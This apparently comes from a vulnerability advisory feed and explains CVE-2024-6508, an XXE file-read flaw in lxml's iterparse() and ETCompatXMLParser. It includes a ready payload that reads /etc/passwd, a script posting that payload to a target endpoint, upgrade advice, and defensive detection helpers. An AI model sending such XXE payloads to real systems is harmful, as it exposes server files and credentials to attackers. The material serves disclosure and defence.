How CVE-2024-6508 works
The vulnerability affects lxml's `iterparse()` and `ETCompatXMLParser` when the default `resolve_entities=True` is used. In these parsers, external entities in untrusted XML input are resolved, allowing an attacker to read local files. For example, a crafted XML payload defines an external entity pointing to `/etc/passwd`; when parsed, the entity expands and the file content is included in the parsed output.

The standard XML/HTML parsers in lxml 5.0 changed their default to `resolve_entities='internal'`, which prevents external entity expansion. However, `iterparse()` and `ETCompatXMLParser` kept the unsafe default `resolve_entities=True` until lxml 6.1.0.

An attacker can host malicious XML on a website or supply it via an API endpoint. If the application uses either parser without explicitly setting a safe `resolve_entities` value, the server reads arbitrary local files. This leads to information disclosure of sensitive files (e.g., configuration, secrets, source code). The issue is a classic XML External Entity (XXE) attack, but limited to file reading (no SSRF or DoS by default). The patch in lxml 6.1.0 changes the default to `resolve_entities='internal'` for all parsers, disabling local file access unless explicitly overridden.
Platform: lxml library
Version: before 6.1.0
Vulnerability: XML external entity
Severity: Medium
Date: 2024-07-09
Prediction: 2024-07-08
What Undercode Says:
Check vulnerable version:

```shell
python3 -c "import lxml.etree; print(lxml.etree.__version__)"
```
Exploit payload (evil.xml):

```shell
echo '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>' > evil.xml
```
Vulnerable Python code (iterparse):

```python
from lxml import etree

# The unsafe default: external entities in the DOCTYPE are resolved while parsing
for event, elem in etree.iterparse('evil.xml', resolve_entities=True):
    print(elem.text)
```
Exploit:

Attacker sends XML via POST:

```python
import requests

xml = '''<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>'''
requests.post('https://target.com/parse', data=xml)
```

Server returns /etc/passwd contents in response.
Protection from this CVE:

- Upgrade to lxml >= 6.1.0
- Set `resolve_entities='internal'` or `resolve_entities=False` explicitly
- Use safe parsers: `etree.XMLParser(resolve_entities='internal')`
- Disable external entity processing in all XML handling
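As an added example (not part of the original post or of lxml itself), the helpers below put the protection list into code: a wrapper that pins `resolve_entities='internal'` on `iterparse()` regardless of the installed version, a pre-parse gate that refuses any DOCTYPE declaring a SYSTEM/PUBLIC entity, and a version check against 6.1.0. The sample documents are constructed for this example, and `safe_iterparse` assumes `iterparse()` accepts the `'internal'` value, as the protection list states.

```python
import re

# Per the advisory above: below this version iterparse()/ETCompatXMLParser
# default to resolve_entities=True.
FIXED_VERSION = (6, 1, 0)

# Constructed samples: one with an external SYSTEM entity (the XXE shape
# discussed above), one with a harmless internal entity.
XXE_SAMPLE = ('<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM '
              '"file:///etc/passwd">]><root>&xxe;</root>')
INTERNAL_SAMPLE = '<!DOCTYPE foo [<!ENTITY greet "hi">]><root>&greet;</root>'

# Matches general (<!ENTITY name SYSTEM ...) and parameter (<!ENTITY % name ...)
# entity declarations that reference an external resource.
_EXTERNAL_ENTITY = re.compile(r"<!ENTITY\s+(?:%\s+)?\S+\s+(?:SYSTEM|PUBLIC)\b", re.I)


def version_tuple(version: str) -> tuple:
    """'6.1.0.dev1' -> (6, 1, 0); short versions are padded with zeros."""
    parts = [int(p) for p in re.findall(r"\d+", version)[:3]]
    return tuple(parts + [0] * (3 - len(parts)))


def iterparse_default_is_unsafe(lxml_version: str) -> bool:
    """True when this lxml release still defaults iterparse() to resolve_entities=True."""
    return version_tuple(lxml_version) < FIXED_VERSION


def has_external_entity_decl(xml_text: str) -> bool:
    """Pre-parse gate for untrusted input: flag documents declaring external entities."""
    return _EXTERNAL_ENTITY.search(xml_text) is not None


def safe_iterparse(source, **kwargs):
    """lxml iterparse() with the safe value pinned explicitly (assumption: iterparse()
    accepts resolve_entities='internal', as the protection list above states)."""
    from lxml import etree  # local import so the stdlib helpers work without lxml
    kwargs.setdefault("resolve_entities", "internal")
    return etree.iterparse(source, **kwargs)


if __name__ == "__main__":
    for label, doc in (("XXE_SAMPLE", XXE_SAMPLE), ("INTERNAL_SAMPLE", INTERNAL_SAMPLE)):
        print(label, "declares external entity:", has_external_entity_decl(doc))
    try:
        import lxml.etree
    except ImportError:
        print("lxml not installed")
    else:
        ver = lxml.etree.__version__
        print("lxml", ver, "unsafe iterparse default:", iterparse_default_is_unsafe(ver))
```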
Impact
Unauthenticated attackers can read arbitrary local files (e.g., /etc/passwd, /proc/self/environ, source code, credentials) from the server processing untrusted XML. No RCE or privilege escalation, but severe information disclosure leading to lateral movement or further compromise.
Sources:
Reported By: github.com